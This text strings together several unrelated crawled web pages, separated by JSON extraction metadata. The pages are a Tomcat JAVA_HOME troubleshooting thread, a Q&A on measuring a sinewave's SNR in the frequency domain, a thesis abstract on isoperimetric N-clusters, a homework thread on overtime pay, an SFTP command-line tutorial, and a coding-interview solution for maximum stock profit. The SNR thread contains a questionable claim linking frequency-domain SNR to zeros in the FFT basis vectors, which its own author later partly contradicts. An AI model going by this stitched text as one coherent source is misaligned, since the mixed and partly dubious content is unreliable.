{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8725098967552185, "perplexity": 1869.0144207539165}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-06/segments/1674764499804.60/warc/CC-MAIN-20230130070411-20230130100411-00252.warc.gz"}
http://www.coderanch.com/t/565349/Tomcat/JAVA-HOME-point-JDK-JRE
Big Moose Saloon Search | Java FAQ | Recent Topics | Flagged Topics | Hot Topics | Zero Replies Register / Login Win a copy of Spring in Action this week in the Spring forum! # JAVA_HOME should point to a JDK not a JRE nattynids Gupta Greenhorn Joined: Jan 23, 2012 Posts: 6 Hi, I am not able to start my tomcat. It is giving the below gien error: The JAVA_HOME environment variable is not defined correctly This environment variable is needed to run this program NB: JAVA_HOME should point to a JDK not a JRE I have done th following settings in the user variables: JAVA_HOME: C:\Program Files\Java\jdk1.6.0_24 CLASSPATH: E:\softwares\Tomcatnew\Tomcat\apache-tomcat-6.0.32\lib PATH: C:\Program Files\Java\jdk1.6.0_24\lib;%JAVA_HOME%\bin I have done th following settings in the system variables: JAVA_HOME: C:\Program Files\Java\jdk1.6.0_24 CLASSPATH: E:\softwares\Tomcatnew\Tomcat\apache-tomcat-6.0.32\lib PATH: %JAVA_HOME%\bin Please let me know what settings am i missing here. Rob Spoor Sheriff Joined: Oct 27, 2005 Posts: 19719 20 Are those actually user environment variables? Because unless Tomcat runs under your user account it doesn't see those. Change the JAVA_HOME variable into a system variable. You can also drop the other two as far as Tomcat is concerned, it doesn't need those. Especially the PATH variable is dangerous, as it removes all other PATH entries. SCJP 1.4 - SCJP 6 - SCWCD 5 - OCEEJBD 6 nattynids Gupta Greenhorn Joined: Jan 23, 2012 Posts: 6 Hi Rob, The same values are there in the system variables as well. Tried deleting the PATH as well. No progress. Same result. John Jai Bartender Joined: May 31, 2011 Posts: 1776 Any particular reason you have the \lib under path? Keep only the System variables and try removing the \lib from the Path variable. Let this be @ first path - C:\Program Files\Java\jdk1.6.0_24\bin. Try java -version in the cmd prompt and confirm if your path is right. Open a new cmd prompt after altering these values. nattynids Gupta Greenhorn Joined: Jan 23, 2012 Posts: 6 Hi John, No particular reason why lib was there. I modified the PATH to C:\Program Files\Java\jdk1.6.0_24\bin Still the same error. Do i need to restart the sytem after these changes? What i did was i modified the PATH & restarted the Tomcat. John Jai Bartender Joined: May 31, 2011 Posts: 1776 I have seen this error recently and resolved by configuring JAVA_HOME as a System Variable. Just after configuring and starting Tomcat again it worked well. John Jai Bartender Joined: May 31, 2011 Posts: 1776 Try below commands and check if you are getting desired results - nattynids Gupta Greenhorn Joined: Jan 23, 2012 Posts: 6 Hi John, I got the following: C:\Users\nigupta6>echo %JAVA_HOME% C:\Program Files\Java\jdk1.6.0_24 C:\Users\nigupta6>echo %PATH% C:\Program Files\Java\jdk1.6.0_24\bin;C:\Program Files\Java\jdk1.6.0_24\bin John Jai Bartender Joined: May 31, 2011 Posts: 1776 Yikes - So the JAVA_HOME is pointed to a JDK but still you get the error like JAVA_HOME should point to a JDK and not a JRE? Is the error still occurring while starting Tomcat? nattynids Gupta Greenhorn Joined: Jan 23, 2012 Posts: 6 yes ji... Tel me do we need to map from java build path in eclipse? Akhilesh Trivedi Ranch Hand Joined: Jun 22, 2005 Posts: 1527 nattynids Gupta wrote:yes ji... Tel me do we need to map from java build path in eclipse? Are you starting Tomcat from within Eclipse? Try restarting eclipse. Keep Smiling Always — My life is smoother when running silent. -paul [FAQs] [Certification Guides] [The Linux Documentation Project] nattynids Gupta Greenhorn Joined: Jan 23, 2012 Posts: 6 Thanks all... The issue was the incorrect path in the Catalina file in Tomcat... John Jai Bartender Joined: May 31, 2011 Posts: 1776 he he... thanks for sharing that kaiser rommel Greenhorn Joined: Apr 23, 2014 Posts: 1
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9406004548072815, "perplexity": 18182.309624600693}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2014-42/segments/1413507445299.20/warc/CC-MAIN-20141017005725-00370-ip-10-16-133-185.ec2.internal.warc.gz"}
https://dsp.stackexchange.com/questions/14862/measure-the-snr-of-a-signal-in-the-frequency-domain
# Measure the SNR of a signal in the frequency domain? How do you measure the SNR of a sinewave in the frequency domain? (Assuming no filtering.) Suppose: $$x(n) = s(n) + n(n)$$ Create the signal (nCycles of a sinewave) in MATLAB...: sampleRate = 1024; f0 = sampleRate/8; nCycles = 11; time = 0:1/sampleRate:nCycles/f0; signal = sin(2*pi*f0*time); Create the noise and scale it by the desired SNR... SNR = 10; noise = randn(size(signal)); % scale the noise to obtain the desired SNR noise = noise / norm(noise) * norm(signal) / 10^(SNR/20); x = signal + noise; Calculate the resulting SNR (in the time domain): actualSNR = 20*log10(norm(signal)/norm(x - signal)); disp(['SNR = ',num2str(actualSNR),' dB']) Plot the noisy signal in time and frequency subplot(2,1,1) % plot the signal in time plot(time,signal) hold on; grid on plot(time,x,'r') % plot the noisy signal in frequency NFFT = 4096; X = fftshift(fft(x,NFFT)); X = X/max(abs(X)); f = sampleRate/2*linspace(-1,1,NFFT); subplot(2,1,2) plot(f,20*log10(abs(X))) grid on; • Specifying a SNR without mention of a bandwidth has little meaning. I.e., for a pure tone, the narrower the bandwidth, the higher the SNR. That's one of the main reasons to use a filter - increase the SNR. – rickhg12hs Mar 8 '14 at 20:45 • I disagree with you. Since I didn't mention any filters, it's quite clear what the bandwidth of interest is. – Seth Mar 10 '14 at 15:43 • Well, maybe in your signal world. Why someone wouldn't use a simple filter to increase the SNR is at least questionable. Nice OP edit. – rickhg12hs Mar 11 '14 at 1:50 It can be a little tricky. If your sine wave happens to fall at an FFT bin center, things are a little easier. If your sine wave happens to not fall at a bin center, you have to consider spectral leakage. You'll also need to consider how your window function affects your signal. A simple technique to estimate the signal power would be to sum the squared magnitudes of the FFT bins with most of the signal's energy (i.e. the largest bins). To get the noise energy, sum the squared magnitude of all of the other bins. This will get you close. If you know the SNR per sample in the time domain (SNRt) the SNR in the frequency domain (SNRf) will be $$SNR_f = SNR_t \sqrt{N}$$ where N is the number of non zero elements in the basis vector in the Fourier transform. The fastest Fourier transforms (FFT with $n=2^{integer}$) has most zeros and thus lowest SNRf. The highest SNRf comes with $N$ as a prime number with no zeros in the basis vectors, which is also thus the most arithmetically intense choice of sample size. Quality costs. Also pay attention to the fact that the number of zeros in the basis vectors in the FFT depends on the frequency leading to SNRf being frequency dependent. Lowest SNRf is at the middle frequency where every second element of the cosine part is zero. Now tell me why people still use sample sets of 2^integer when it is the choice of lowest quality? Today we have the means to do the extra computations of a zero free Fourier transform. It would led to better image quality, better sound and higher data rates. • How would you know the SNR per sample in the time domain? Can you elaborate on "The highest SNRf comes with N as a prime number with no zeros in the basis vectors"? – Seth Nov 10 '14 at 4:46 • SNR in time domain is either given, measured, assumed or calculated. I was specifically thinking about the cosine transformation or the even FFT when talking about zero free basis. Check for example the basis vector link which uses samle size 2^4=16 and having half of the components zero. Change that to 17 and get no zeros link – David Jonsson Nov 12 '14 at 12:51 • The intent of the question was to determine the SNR given no information about the time domain. Doesn't the FFT become the DFT if N is not a power of 2? – Seth Nov 12 '14 at 22:06 • Sure, the inverse is so similar, just a change of sign in the exponent, that the relation holds. So for the inverse Fourier transform, with signal to noise ratio in a specific frequency SNRif, the SNR in the resulting time domain would be SNRit = √N SNRif – David Jonsson Nov 23 '14 at 21:03 • Addition. With a properly scaled transformation there is no change in variance or standard deviation in a Fourier transform, but there is an increase in the expected value for the DC signal. It grows as $$µ_f = \sqrt N µ_t$$ this is not dependent on the number of zeros in the basis vectors. – David Jonsson Dec 18 '14 at 16:09 Here is a better answer (than the one I gave before) based on properly scaled Fourier transformations where basis vectors are normalized to length 1. Noise, a normal distribution of a random variable, has the following variance, based on https://en.wikipedia.org/wiki/Variance#Basic_properties for variance of a linear combination with no correlation, applies to both the Fourier transformation and it's inverse $${Var}\left(\sum _{{i=1}}^{{N}}a_{i}X_{i}\right) = \sum _{{i=1}}^{{N}}a_{i}^{2}\operatorname {Var}(X_{i})$$ The same variance for all Xi means $${Var}\left(\sum _{{i=1}}^{{N}}a_{i}X_{i}\right) = \sum _{{i=1}}^{{N}}a_{i}^{2}\operatorname {Var}(X) = \left(\sum _{{i=1}}^{{N}}a_{i}^{2}\right)\operatorname {Var}(X)$$ Example 1 The first row DC basis vector in a even Fourier transform $$\left(\frac{1}{\sqrt N } , \frac{1}{\sqrt N } , \frac{1}{\sqrt N } , ... \right)$$ gives a variance of $$Var(Transform) = N \left( \frac{1}{\sqrt N } \right)^2 Var(X) = Var(X)$$ Example 2 A basis vector in an even fast Fourier transform with a wavelength of 4 samples, a repeating series of $$\left( \sqrt{\frac{2}{N}} , 0 , -\sqrt{\frac{2}{N}} , 0 , ... \right)$$ This is the basis vector with most zero elements, every second. The variance becomes $$Var(Transform) = \frac{N}{2} \left( \sqrt{\frac{2}{N}} \right)^2 Var(X) = Var(X)$$ So variance, and thus standard deviation, is independent of basis vectors and zero elements. But what happens to the signal, the expected value? Maybe someone else can show that? Another solution can be to model the noise using the non-sine frequencies. This relies on having a reasonable parametric model whose parameters can be estimated from the non-sine frequencies. E.g. if you know the noise is white or pink, this is fairly straightforward. Once you've got the parameters estimated, it's also easy to estimate how much noise there is at the sine frequency, and sum up all noise contributions.
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8891549706459045, "perplexity": 770.1228017392398}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-05/segments/1579250614086.44/warc/CC-MAIN-20200123221108-20200124010108-00087.warc.gz"}
http://cvgmt.sns.it/paper/2911/
# On the isoperimetric properties of planar N-clusters created by caroccia on 22 Jan 2016 [BibTeX] Phd Thesis Inserted: 22 jan 2016 Last Updated: 22 jan 2016 Year: 2015 Notes: This Thesis aims to highlight some isoperimetric questions involving the, so-called, $N$-clusters. We first briefly recall the theoretical framework we are adopting. This is done in Chapter one. In chapter two we focus on the standard isoperimetric problem for planar N-cluster for large values of $N$ and we provide an equidistribution energy-type results under some suitable assumption. The third Chapter is devoted to a stability results of the hexagonal honeycomb tiling. Finally in the fourth Chapter we consider a generalization of the Cheeger constant, defined as a minimization of a suitable energy among the class of the $N$-clusters. We show how this problem is related to the optimal partition problem for the first Dirichlet eigenvalue of the Laplacian introduced by Caffarelli and Fang-Hua Lin in 2007. We conclude, in Chapter five, with some remarks and some possible future direction of investigation.
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9040785431861877, "perplexity": 505.86881344745393}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-09/segments/1518891812880.33/warc/CC-MAIN-20180220050606-20180220070606-00091.warc.gz"}
http://openstudy.com/updates/51159021e4b09e16c5c82060
## A community for students. Sign up today Here's the question you clicked on: 55 members online • 0 viewing ## anonymous 3 years ago Joelle earns her regular pay of $7.50 per hour for up to 40 hours of work in a week. For each hour over 40 hours in a week, she is paid 1 and 1/2 times her regular pay. how much does joelle earn for a week in which she works 42 hours? Delete Cancel Submit • This Question is Closed 1. anonymous • 3 years ago Best Response You've already chosen the best response. 0 is the answer$472.50? 2. anonymous • 3 years ago Best Response You've already chosen the best response. 0 $7.50 an hour = if she works up to 40 hours$7.50 x 1.5 = if she works more than 40 hours. 3. anonymous • 3 years ago Best Response You've already chosen the best response. 0 no it is not. 4. anonymous • 3 years ago Best Response You've already chosen the best response. 0 please tell me your working out, how you achieved that answer. 5. anonymous • 3 years ago Best Response You've already chosen the best response. 0 I multiplied 7.50 by 1.5=11.25 then i multiplied 11.25 by 42 which equals 472.50 6. anonymous • 3 years ago Best Response You've already chosen the best response. 0 now that is wrong because that only applies for when she works for more than 40 hours. 7. anonymous • 3 years ago Best Response You've already chosen the best response. 0 she did. she worked 42 hours 8. anonymous • 3 years ago Best Response You've already chosen the best response. 0 nononono. 9. anonymous • 3 years ago Best Response You've already chosen the best response. 0 ok. explain 10. anonymous • 3 years ago Best Response You've already chosen the best response. 0 "More than" 40 hours key word "More than" 11. jim_thompson5910 • 3 years ago Best Response You've already chosen the best response. 1 ashleyb that answer would be correct if she got paid 1 and a half times her regular pay of $7.50 for the entire 42 hours but that overtime bonus only applies for the additional 2 hrs (not the full 42 hrs) 12. anonymous • 3 years ago Best Response You've already chosen the best response. 0$7.50 an hour = if she works up to 40 hours $7.50 x 1.5 = if she works more than 40 hours. How many hours did she work for more than 40 hours? so 40 + 2 = 42 hours that she worked in total. do you see she has worked 2 hours over 40 hours? 13. stamp • 3 years ago Best Response You've already chosen the best response. 0 $r_{regular}=750\ cents$$r_{overtime}=150\%(r_{regular})$$r_{overtime}=\frac{150}{100}750=15*75=750+5(75)=$$750+375=1125\frac{cents}{hour}=r_{overtime}$ pay = regular + overtime $pay_{cents}=750(40)+1125(2)$ 14. jim_thompson5910 • 3 years ago Best Response You've already chosen the best response. 1 you would have to do it in pieces calculate her total pay for working 40 hrs at$7.50 an hour then add on the additional bonus pay of working 2 hrs at 1.5*7.50 = 11.25 dollars an hour 15. anonymous • 3 years ago Best Response You've already chosen the best response. 0 yes @jim_thompson5910 says it well, she has worked additionally two hours on top of the 40 base hours. 16. anonymous • 3 years ago Best Response You've already chosen the best response. 0 jayds: yes 17. anonymous • 3 years ago Best Response You've already chosen the best response. 0 311.25? 18. anonymous • 3 years ago Best Response You've already chosen the best response. 0 yes u are right. 19. anonymous • 3 years ago Best Response You've already chosen the best response. 0 wait. 20. anonymous • 3 years ago Best Response You've already chosen the best response. 0 i think u may have mistyped it. 21. jim_thompson5910 • 3 years ago Best Response You've already chosen the best response. 1 I'm getting 322.5, so you're 11.25 off somehow 22. anonymous • 3 years ago Best Response You've already chosen the best response. 0 in the calculator. 23. jim_thompson5910 • 3 years ago Best Response You've already chosen the best response. 1 you must have only calculated 1 additional hour of overtime instead of 2 24. stamp • 3 years ago Best Response You've already chosen the best response. 0 300 + 22.50 = 322.50 $25. anonymous • 3 years ago Best Response You've already chosen the best response. 0 First 40 hours = base pay of$7.50 per hour additional 2 hours = base pay x 1.5 = 7.50 x 1.5 = 11.25 per hour 26. anonymous • 3 years ago Best Response You've already chosen the best response. 0 stamp: how did u get 322.50 27. jim_thompson5910 • 3 years ago Best Response You've already chosen the best response. 1 Regular: 40 hours at $7.50 an hour =$300 in total pay Overtime: 2 hours at $11.25 an hour =$22.50 in total pay Overall, she made 300+22.50 = 322.50 dollars working 42 hours 28. anonymous • 3 years ago Best Response You've already chosen the best response. 0 OHHHHH!!!! i understand!! thankyou! 29. jim_thompson5910 • 3 years ago Best Response You've already chosen the best response. 1 you're welcome 30. Not the answer you are looking for? Search for more explanations. • Attachments: Find more explanations on OpenStudy ##### spraguer (Moderator) 5→ View Detailed Profile 23 • Teamwork 19 Teammate • Problem Solving 19 Hero • You have blocked this person. • ✔ You're a fan Checking fan status... Thanks for being so helpful in mathematics. If you are getting quality help, make sure you spread the word about OpenStudy.
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 2, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9968003630638123, "perplexity": 12743.418939985859}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.3, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2016-50/segments/1480698541556.70/warc/CC-MAIN-20161202170901-00086-ip-10-31-129-80.ec2.internal.warc.gz"}
https://code.adonline.id.au/sftp-via-the-command-line/
Dear Internet Explorer user: Your browser is no longer supported Please switch to a modern browser such as Microsoft Edge, Mozilla Firefox or Google Chrome to view this website's content. # SFTP via the Command Line If you have a large quantity of files that you want to transfer from one server to another, the File Transfer Protocol (FTP) is the way to go. This comes in a secure version called SFTP which uses SSH (Secure Shell) to encrypt the data. Traditionally uploads and downloads via FTP would be conducted using a GUI software programme such as WinSCP or FileZilla, but it’s actually possible to transfer files using SFTP on the command line. Here’s how it’s done: ## Connect to the server To connect to a remote SFTP server, establish a secure SSH connection and then create a SFTP session as shown: \$ sftp [email protected] To check the remote working directory, enter the pwd command: sftp> pwd Remote working directory: /group/home/adam/ To check the local working directory, type the lpwd command: sftp> lpwd Local working directory: t:\files\photos Before uploading whole directories, you’ll need to create a target directory on the remote server. Let’s call this “photos”: sftp> mkdir photos If you don’t want to create a directory in the current path (as determined by pwd), cd to the location where you want to create your new directory: sftp> cd /group/home/adam/path/to/my/files/ sftp> mkdir photos To start the upload, your local working directory will need to be in the parent. So in this case, if we want to upload the entire directory from t:\files\photos, then our local working directory should be t:\files. We can easily change this via the lcd command then check via lpwd: sftp> lcd t:\files sftp> lpwd Local working directory: t:\files To upload, the put command is used: sftp> put -pr photos The -p flag preserves all modification times, access times, and modes from the original files transferred whilst the -r flag allows subdirectories and subfolders to be uploaded. Typical output may look like this: sftp> put -pr upload Entering photos/ photos/IMG_1507.jpg 100% 10MB 265.1KB/s 00:39 photos/IMG_1507.xmp 100% 8703 21.3KB/s 00:00 photos/IMG_1511.jpg 100% 10MB 265.5KB/s 00:37 photos/IMG_1511.xmp 100% 8702 50.0KB/s 00:00 Entering photos/pix photos/test/IMG_1507.CR2 100% 25MB 223.0KB/s 01:56 photos/test/IMG_1511.CR2 100% 25MB 188.9KB/s 02:16 To download files from a Linux server via the command line, you’ll need to change the remote working directory to the parent. So, if I wanted to download files from /group/home/adam/photos, I’d need to cd to /group/home/adam: sftp> cd /group/home/adam/ The target location on the local server also needs to be specified and must already exist. If it does not exist, it can be created in the command line as follows: sftp> lmkdir photos The get command can then be used to download the files: sftp> get -r photos Typical output: sftp> get -r photos /group/home/adam/photos/pix/IMG_1511.xmp 100% 8702 39.4KB/s 00:00 ## Exiting the Shell To exit, type exit into the command line. No comments have yet been submitted. Be the first! The following HTML is permitted: <a href="" title=""> <b> <blockquote cite=""> <code> <em> <i> <q cite=""> <strike> <strong> Comments will be published subject to the Editorial Policy. 
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.4280011057853699, "perplexity": 11084.068475826212}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-39/segments/1631780057622.15/warc/CC-MAIN-20210925112158-20210925142158-00207.warc.gz"}
https://www.interviewcake.com/
# I will teach you to be goodat programming interviews The coding interview is a winnable game. I'll show you the tricks to quickly solve problems you've never seen before. ## Sample Programming Interview Question Writing coding interview questions hasn't made me rich. Maybe trading Apple stocks will. I have an array stock_prices_yesterday where: • The indices are the time in minutes past trade opening time, which was 9:30am local time. • The values are the price in dollars of Apple stock at that time. For example, the stock cost $500 at 10:30am, so stock_prices_yesterday[60] = 500. Write an efficient algorithm for computing the best profit I could have made from 1 purchase and 1 sale of 1 Apple stock yesterday. No "shorting"—you must buy before you sell. You may not buy and sell in the same time step (at least 1 minute must pass). It is not sufficient to simply take the difference between the highest price and the lowest price, because the highest price may come before the lowest price. You must buy before you sell. What if the stock value goes down all day? In that case, the best profit will be negative. You can do this in time and space! The brute force approach would be to try every pair of times (treating the earlier time as the buy time and the later time as the sell time) and see which one is higher. def get_max_profit(stock_prices_yesterday): max_profit = 0 # go through every time for outer_time in xrange(len(stock_prices_yesterday)): # for every time, go through every OTHER time for inner_time in xrange(len(stock_prices_yesterday)): # for each pair, find the earlier and later times earlier_time = min(outer_time, inner_time) later_time = max(outer_time, inner_time) # and use those to find the earlier and later prices earlier_price = stock_prices_yesterday[earlier_time] later_price = stock_prices_yesterday[later_time] # see what our profit would be if we bought at the # earlier price and sold at the later price potential_profit = later_price - earlier_price # update max_profit if we can do better max_profit = max(max_profit, potential_profit) return max_profit But that will take time, since we have two nested loops—for every time, we're going through every other time. Can we do better? Well, we’re doing a lot of extra work. We’re looking at every pair twice. We know we have to buy before we sell, so in our inner for loop we could just look at every price after the price in our outer for loop. That could look like this: def get_max_profit(stock_prices_yesterday): max_profit = 0 # go through every price (with its index as the time) for earlier_time, earlier_price in enumerate(stock_prices_yesterday): # and go through all the LATER prices for later_price in stock_prices_yesterday[earlier_time:]: # see what our profit would be if we bought at the # earlier price and sold at the later price potential_profit = later_price - earlier_price # update max_profit if we can do better max_profit = max(max_profit, potential_profit) return max_profit What’s our runtime now? Well, our outer for loop goes through all the times and prices, but our inner for loop goes through one fewer price each time. So our total number of steps is the sum n + (n - 1) + (n - 2) ... + 2 + 1, which is still time. We can do better! If we're going to do better than , we're probably going to do it in either or . comes up in sorting and searching algorithms where we're recursively cutting the set in half. It's not obvious that we can save time by cutting the set in half here. Let's first see how well we can do by looping through the set only once. Since we're trying to loop through the set once, let's use a greedy approach, where we keep a running max_profit until we reach the end. We'll start our max_profit at$0. As we're iterating, how do we know if we've found a new max_profit? At each iteration, our max_profit is either: 1. the same as the max_profit at the last time step, or 2. the max profit we can get by selling at the current_price How do we know when we have case (2)? The max profit we can get by selling at the current_price is simply the difference between the current_price and the min_price from earlier in the day. If this difference is greater than the current max_profit, we have a new max_profit. So for every price, we’ll need to: • keep track of the lowest price we’ve seen so far • see if we can get a better profit Here’s one possible solution: def get_max_profit(stock_prices_yesterday): min_price = stock_prices_yesterday[0] max_profit = 0 for current_price in stock_prices_yesterday: # ensure min_price is the lowest price we've seen so far min_price = min(min_price, current_price) # see what our profit would be if we bought at the # min price and sold at the current price potential_profit = current_price - min_price # update max_profit if we can do better max_profit = max(max_profit, potential_profit) return max_profit We’re finding the max profit with one pass and constant space! Are we done? Let’s think about some edge cases. What if the stock value stays the same? What if the stock value goes down all day? If the stock price doesn't change, the max possible profit is 0. Our function will correctly return that. So we're good. But if the value goes down all day, we’re in trouble. Our function would return 0, but there’s no way we could break even if the price always goes down. How can we handle this? Well, what are our options? Leaving our function as it is and just returning zero is not a reasonable option—we wouldn't know if our best profit was negative or actually zero, so we'd be losing information. Two reasonable options could be: 1. return a negative profit. “What’s the least badly we could have done?” 2. throw an error. “We should not have purchased stocks yesterday!” In this case, it’s probably best to go with option (1). The advantages of returning a negative profit are: • We more accurately answer the challenge. If profit is "revenue minus expenses", we’re returning the best we could have done. • It's less opinionated. We'll leave decisions up to our function’s users. It would be easy to wrap our function in a helper function to decide if it’s worth making a purchase. • We allow ourselves to collect better data. It matters if we would have lost money, and it matters how much we would have lost. If we’re trying to get rich, we’ll probably care about those numbers. How can we adjust our function to return a negative profit if we can only lose money? Initializing max_profit to 0 won’t work... Well, we started our min_price at the first price, so let’s start our max_profit at the first profit we could get—if we buy at the first time and sell at the second time. min_price = stock_prices_yesterday[0] max_profit = stock_prices_yesterday[1] - stock_prices_yesterday[0] But we have the potential for an index out of bounds error here, if stock_prices_yesterday has fewer than 2 prices. We do want to throw an error in that case, since profit requires buying and selling, which we can't do with less than 2 prices. So rather than throwing a confusing index out of bounds error, let's explicitly catch that case and throw a more helpful error message: if len(stock_prices_yesterday) < 2: raise IndexError('Getting a profit requires at least 2 prices') min_price = stock_prices_yesterday[0] max_profit = stock_prices_yesterday[1] - stock_prices_yesterday[0] # etc... Ok, does that work? No! max_profit is still always 0! What’s happening? If the price always goes down, min_price is always set to the current_price. So current_price - min_price comes out to 0, which of course will always be greater than a negative profit. When we’re calculating the max_profit, we need to make sure we never have a case where we try both buying and selling stocks at the current_price. To make sure we’re always buying at an earlier price, never the current_price, let’s switch the order around so we calculate max_profit before we update min_price. We'll also need to pay special attention to time 0. Make sure we don't try to buy and sell at time 0! We’ll greedily walk through the array to track the max profit and lowest price so far. For every price, we check if: • we can get a better profit by buying at min_price and selling at the current_price • we have a new min_price To start, we initialize: 1. min_price as the first price of the day 2. max_profit as the first profit we could get We decided to return a negative profit if the price decreases all day and we can't make any money. We could have thrown an error instead, but returning the negative profit is cleaner, makes our function less opinionated, and ensures we don't lose information. def get_max_profit(stock_prices_yesterday): # make sure we have at least 2 prices if len(stock_prices_yesterday) < 2: raise IndexError('Getting a profit requires at least 2 prices') # we'll greedily update min_price and max_profit, so we initialize # them to the first price and the first possible profit min_price = stock_prices_yesterday[0] max_profit = stock_prices_yesterday[1] - stock_prices_yesterday[0] for index, current_price in enumerate(stock_prices_yesterday): # skip the first (0th) time # we can't sell at the first time, since we must buy first, # and we can't buy and sell at the same time! # if we took this out, we'd try to buy /and/ sell at time 0. # this would give a profit of 0, which is a problem if our # max_profit is supposed to be /negative/--we'd return 0! if index == 0: continue # see what our profit would be if we bought at the # min price and sold at the current price potential_profit = current_price - min_price # update max_profit if we can do better max_profit = max(max_profit, potential_profit) # update min_price so it's always # the lowest price we've seen so far min_price = min(min_price, current_price) return max_profit time and space. We only loop through the array once. We have plenty more practice programming interview questions. Some easy, some hard. If you're ready to get really freaking good at coding interviews, get started now→ . . .
